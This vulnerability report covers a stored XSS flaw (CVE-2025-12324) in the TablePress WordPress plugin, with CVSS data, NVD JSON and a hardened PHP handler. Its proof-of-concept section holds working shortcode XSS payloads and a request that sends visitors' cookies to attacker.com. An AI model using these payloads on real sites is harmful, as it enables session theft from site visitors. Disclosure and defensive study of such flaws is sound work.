Security Vulnerability Report
CVE-2025-12324 CVSS 6.4 MEDIUM

Published: 2025-11-04 03:15:50
Last Modified: 2026-04-15 00:35:42

Description

The TablePress – Tables in WordPress made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `table` shortcode attributes in all versions up to, and including, 3.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

TablePress <= 3.2.3 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
## CVE-2025-12324 PoC - TablePress Stored XSS
## Affected Version: <= 3.2.3
## Target: WordPress with TablePress plugin installed
## WordPress Shortcode Injection PoC

### Method 1: Inject via table shortcode custom_css parameter
[table id=1 custom_css="</style><script>alert('XSS by TablePress CVE-2025-12324');</script>"]

### Method 2: Inject via style parameter
[table id=1 style="xss:expression(alert('XSS'))"]

### Method 3: Inject via table HTML attributes
[table id=1 custom_html="<img src=x onerror=alert(document.cookie)>"]

### Exploit Scenario:
1. Attacker with Contributor role or higher logs into WordPress
2. Attacker creates/edits a post or page
3. Attacker inserts malicious TablePress shortcode with XSS payload
4. When any user views the page, the XSS payload executes in their browser
5. Attacker can steal session cookies, perform actions as the victim

### HTTP Request Example (if API access available):
POST /wp-json/wp/v2/pages/{id} HTTP/1.1
Host: target.com
Content-Type: application/json
Authorization: Bearer {token}

{ "content": "<p>Check this table:</p>[table id=1 custom_css=</style><script>fetch('https://attacker.com/steal?c='+document.cookie)</script>]" }

### Mitigation: Upgrade to TablePress version 3.2.4 or later
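The defensive side of the description above, as an added illustration that is not TablePress's own code: a hypothetical WordPress shortcode handler that interpolates user-supplied attributes straight into markup (the "insufficient input sanitization and output escaping" pattern), beside a hardened version that accepts only known attributes, coerces each to its expected type, and escapes for the context it is emitted into. The shortcode name, function names and the `demo_table_admin_css` option are assumptions; the WordPress API calls (add_shortcode, shortcode_atts, esc_attr, absint, sanitize_html_class, wp_strip_all_tags, get_option) are real.

```php
<?php
// Added illustration, not TablePress code. Runs inside WordPress.

// WEAK (hypothetical): attribute values go into the page unchanged.
// custom_css lands inside <style>, so a value containing "</style>"
// closes the element and whatever follows is parsed as HTML; id and
// class land in a tag, so a quote in them ends the attribute.
function demo_table_shortcode_weak( $atts ) {
    $atts = shortcode_atts( array( 'id' => '0', 'class' => '', 'custom_css' => '' ), $atts, 'demo_table' );
    return '<style>' . $atts['custom_css'] . '</style>'
         . '<table id="demo-table-' . $atts['id'] . '" class="' . $atts['class'] . '"></table>';
}

// HARDENED (hypothetical): allowlist the attributes, validate each one,
// and escape on output for the exact context.
function demo_table_shortcode_hardened( $atts ) {
    // Unknown attributes (custom_css, custom_html, style, ...) are dropped here.
    $atts = shortcode_atts( array( 'id' => '0', 'class' => '' ), $atts, 'demo_table' );

    // Integer id: absint() maps anything non-numeric to 0, which we reject.
    $id = absint( $atts['id'] );
    if ( 0 === $id ) {
        return '';
    }

    // Class list: each token reduced to characters valid in a CSS class.
    $classes = array_filter( array_map( 'sanitize_html_class', preg_split( '/\s+/', $atts['class'] ) ) );

    // Free-form CSS is not taken from post authors at all: there is no
    // attribute-style escaping for a <style> body. It comes from an option
    // only administrators can set (assumed name), and is still defanged so
    // no "<" survives and the element cannot be closed early.
    $css = wp_strip_all_tags( get_option( 'demo_table_admin_css', '' ) );
    $css = str_replace( '<', '', $css );

    return '<style>' . $css . '</style>'
         . '<table id="demo-table-' . esc_attr( $id ) . '"'
         . ' class="' . esc_attr( implode( ' ', $classes ) ) . '"></table>';
}

add_shortcode( 'demo_table', 'demo_table_shortcode_hardened' );
```

With the hardened handler, the three shortcodes in the PoC above yield an empty style block and a plain table, because custom_css, style and custom_html are not in the allowlist that shortcode_atts() keeps.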

References

https://plugins.trac.wordpress.org/browser/tablepress/tags/3.2.4/controllers/controller-frontend.php#L605
https://www.wordfence.com/threat-intel/vulnerabilities/id/4dbd8cac-9e4b-4353-9c62-9cabb60b927c?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12324", "sourceIdentifier": "[email protected]", "published": "2025-11-04T03:15:49.667", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The TablePress – Tables in WordPress made easy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `table` shortcode attributes in all versions up to, and including, 3.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/tablepress/tags/3.2.4/controllers/controller-frontend.php#L605", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4dbd8cac-9e4b-4353-9c62-9cabb60b927c?source=cve", "source": "[email protected]"}]}}